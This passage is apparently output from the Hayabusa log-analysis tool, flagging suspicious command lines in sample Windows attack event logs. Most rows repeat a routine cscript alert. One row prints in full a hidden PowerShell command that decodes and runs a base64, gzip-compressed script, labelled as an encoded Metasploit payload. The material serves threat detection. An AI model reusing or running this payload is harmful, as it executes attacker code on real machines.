SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:08:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:09:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:10:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:11:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:12:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
